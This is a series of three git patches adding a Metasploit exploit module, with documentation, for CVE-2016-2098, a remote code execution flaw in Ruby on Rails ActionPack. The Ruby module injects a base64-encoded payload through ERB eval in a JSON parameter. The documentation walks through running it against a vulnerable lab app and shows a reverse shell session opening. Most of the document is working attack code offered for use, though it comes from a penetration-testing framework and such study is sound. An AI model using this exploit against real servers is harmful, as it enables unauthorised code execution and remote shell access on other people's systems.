From fcf8cda22ff4ac709b11810fc5ed9c3ce9db2245 Mon Sep 17 00:00:00 2001
From: RageLtMan <rageltman [at] sempervictus>
Date: Tue, 28 Jun 2016 02:35:55 -0400
Subject: [PATCH 1/3] Add basic module for CVE-2016-2098

ActionPack versions prior to 3.2.22.2, 4.1.14.2, and 4.2.5.2
implement unsafe dynamic rendering of inline content such that
passing ERB wrapped Ruby code leads to remote execution.

This module only implements the Ruby payloads, but can easily
be extended to use system calls to execute native/alternate
payload types as well.

Test Procedures:
  Clone https://github.com/hderms/dh-CVE_2016_2098
  Run bundle install to match gem versions to those in lockfile
  Run the rails server and configure the metasploit module:
    Set TARGETURI to /exploits
    Configure payload and handler options
  Execute the module, move on to post-exp
---
 .../http/rails_actionpack_inline_exec.rb      | 73 +++++++++++++++++++
 1 file changed, 73 insertions(+)
 create mode 100644 modules/exploits/multi/http/rails_actionpack_inline_exec.rb

diff --git a/modules/exploits/multi/http/rails_actionpack_inline_exec.rb b/modules/exploits/multi/http/rails_actionpack_inline_exec.rb
new file mode 100644
index 0000000000..eddbf6ca69
--- /dev/null
+++ b/modules/exploits/multi/http/rails_actionpack_inline_exec.rb
@@ -0,0 +1,73 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Ruby on Rails ActionPack Inline ERB Code Execution',
+      'Description'    => %q{
+          This module exploits a remote code execution vulnerability in the
+        inline request processor of the Ruby on Rails ActionPack component.
+        This vulnerability allows an attacker to process ERB to the inline
+        JSON processor, which is then rendered, permitting full RCE within
+        the runtime, without logging an error condition.
+
+      },
+      'Author'         =>
+        [
+          'RageLtMan <rageltman[at]sempervictus>'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2016-2098' ]
+        ],
+      'Platform'       => 'ruby',
+      'Arch'           => ARCH_RUBY,
+      'Privileged'     => false,
+      'Targets'        =>	[ ['Automatic', {} ] ],
+      'DisclosureDate' => 'Mar 1 2016',
+      'DefaultOptions' => {
+        "PrependFork" => true
+      },
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
+        OptString.new('TARGETPARAM', [ true, 'The target parameter to inject with inline code', 'id'])
+      ], self.class)
+
+  end
+
+  def json_request
+    code = Rex::Text.encode_base64(payload.encoded)
+    return {
+      datastore['TARGETPARAM'] => {"inline" => "<%= eval(%[#{code}].unpack(%[m0])[0]) %>"}
+    }.to_json
+  end
+
+  #
+  # Send the actual request
+  #
+  def exploit
+      send_request_cgi({
+        'uri'     => normalize_uri(target_uri.path),
+        'method'  => 'GET',
+        'ctype'   => 'application/json',
+        'headers' => {
+          'Accept' => 'application/json'
+        },
+        'data'    => json_request
+      }, 25)
+  end
+end

From 2cc6565cc989c1befa0cc5418d28ccf703a85cb1 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 7 Jul 2016 15:56:50 -0500
Subject: [PATCH 2/3] Update rails_actionpack_inline_exec

---
 .../http/rails_actionpack_inline_exec.rb      | 23 ++++++++-----------
 1 file changed, 10 insertions(+), 13 deletions(-)

diff --git a/modules/exploits/multi/http/rails_actionpack_inline_exec.rb b/modules/exploits/multi/http/rails_actionpack_inline_exec.rb
index eddbf6ca69..810ca9abef 100644
--- a/modules/exploits/multi/http/rails_actionpack_inline_exec.rb
+++ b/modules/exploits/multi/http/rails_actionpack_inline_exec.rb
@@ -19,7 +19,6 @@ class MetasploitModule < Msf::Exploit::Remote
         This vulnerability allows an attacker to process ERB to the inline
         JSON processor, which is then rendered, permitting full RCE within
         the runtime, without logging an error condition.
-
       },
       'Author'         =>
         [
@@ -56,18 +55,16 @@ class MetasploitModule < Msf::Exploit::Remote
     }.to_json
   end
 
-  #
-  # Send the actual request
-  #
   def exploit
-      send_request_cgi({
-        'uri'     => normalize_uri(target_uri.path),
-        'method'  => 'GET',
-        'ctype'   => 'application/json',
-        'headers' => {
-          'Accept' => 'application/json'
-        },
-        'data'    => json_request
-      }, 25)
+    print_status("Sending inline code to parameter: #{datastore['TARGETPARAM']}")
+    send_request_cgi({
+      'uri'     => normalize_uri(target_uri.path),
+      'method'  => 'GET',
+      'ctype'   => 'application/json',
+      'headers' => {
+        'Accept' => 'application/json'
+      },
+      'data'    => json_request
+    }, 25)
   end
 end

From 201750a31b899edd2176a2de7fd908260cfa91c5 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 7 Jul 2016 16:15:51 -0500
Subject: [PATCH 3/3] Add documentation for rails_actionpack_inline_exec

---
 .../http/rails_actionpack_inline_exec.md      | 43 +++++++++++++++++++
 1 file changed, 43 insertions(+)
 create mode 100644 documentation/modules/exploit/multi/http/rails_actionpack_inline_exec.md

diff --git a/documentation/modules/exploit/multi/http/rails_actionpack_inline_exec.md b/documentation/modules/exploit/multi/http/rails_actionpack_inline_exec.md
new file mode 100644
index 0000000000..9a9c9b7f77
--- /dev/null
+++ b/documentation/modules/exploit/multi/http/rails_actionpack_inline_exec.md
@@ -0,0 +1,43 @@
+rails_actionpack_inine_exec is a module that exploits the render method in Action Pack.
+Applications that pass unverified user input to the ```render``` method in a controller
+or view may be vulnerable to code injection.
+
+## Vulnerable Application
+
+Action Pack versions prior to 3.2.22.2, 4.1.14.2, and 4.2.5.2 use unsafe dynamic rendering.
+
+## Verification Steps
+
+Assuming you have the right requirements to run a rails server, you can use the following fork
+to set up the vulnerable server for testing:
+
+1. Do: ```git clone https://github.com/wchen-r7/dh-CVE_2016_2098.git```
+2. Do: ```bundle install```
+3. Do: ```rails -s -b 0.0.0.0```
+4. Start msfconsole
+5. Do: ```use exploit/multi/http/rails_actionpack_inline_exec```
+6. Do: ```set RHOST [rails server IP]```
+7. Do: ```set RPORT 3000```. 3000 is the default port for the rails server.
+8. Do: ```set targeturi /exploits```
+9. Configure the rest of the options (for the modules or the payload)
+10. Do: ```exploit```, and you should get a session:
+
+```
+msf exploit(rails_actionpack_inline_exec) > run
+
+[*] Started reverse TCP handler on 192.168.146.1:4444 
+[*] Sending inline code to parameter: id
+[*] Command shell session 1 opened (192.168.146.1:4444 -> 192.168.146.161:56661) at 2016-07-07 15:56:00 -0500
+```
+
+## Options
+
+To use this module, you must manually discover the correct values for these datastore options:
+
+**TARGETURI**
+
+The path to a vulnerable Ruby on Rails application.
+
+**TARGETPARAM**
+
+The target parameter to inject with inline code.